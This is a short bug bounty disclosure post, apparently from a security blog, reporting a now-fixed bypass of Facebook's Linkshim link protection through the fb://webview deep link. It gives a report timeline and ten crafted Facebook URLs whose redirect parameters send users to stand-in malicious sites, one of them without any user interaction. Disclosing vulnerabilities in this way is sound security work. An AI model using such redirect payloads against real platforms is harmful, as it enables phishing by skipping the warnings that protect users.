FB IMG 1572675645451
Posted on by Editorial Team

Facebook: Linkshim protection bypass using fb://webview

Using fb://webview deep link it is possible to bypass linkshim protection and user redirected to evilzon site without notice.

Timeline:

  1. 12 September 2018 : Reported
  2. 13 September 2018 : Triaged
  3. 05 November 2020 : Bounty Paid
  4. 14 November 2020 : Fix was released at server side.

Vulnerable endpoints was:

1. https://mbasic.facebook.com/a/feed_menu.php?story_fbid=xx&id=10000xx&menu_id=u_0_0&continue=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org&action=us&gfid=xx

Using continue button

2. https://m.facebook.com/friends/selector/?return_uri=4&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&friends_key=ids&context&add_photos_uri&is_initial_render=0

Using cancel button

3. https://mbasic.facebook.com/stickers/229247431430xx/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org

4. https://mbasic.facebook.com/messages/photo/?ids&tids%5B0%5D=cid.g.251480506187xxxx&message_text&cancel=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org

5. https://mbasic.facebook.com/search/tabselector/?current_tab=keywords_top&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&query=ok&is_local_serp=0&is_trending=0&vertical=content&refid=46&ref=Footer

6. https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevil.com

7. https://mbasic.facebook.com/tokenizer/single/?mode=share_msg&sid=91916771814xxxx&returnURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&zero_e=2&zero_et=1536231748&_rdc=1&_rdr

8. https://mbasic.facebook.com/photos/xtag_faces/?photo_id=1020467036791xxxx&owner_id=18157600xx&return_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&refid=13

9. https://mbasic.facebook.com/privacyx/selector/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&content_id=8787365733&content_type=1&selected_param=28695816140xxxx&autosave=1

10.  Without user interaction

https://mbasic.facebook.com/friends/hovercard/mbasic/?uid=4&redirectURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org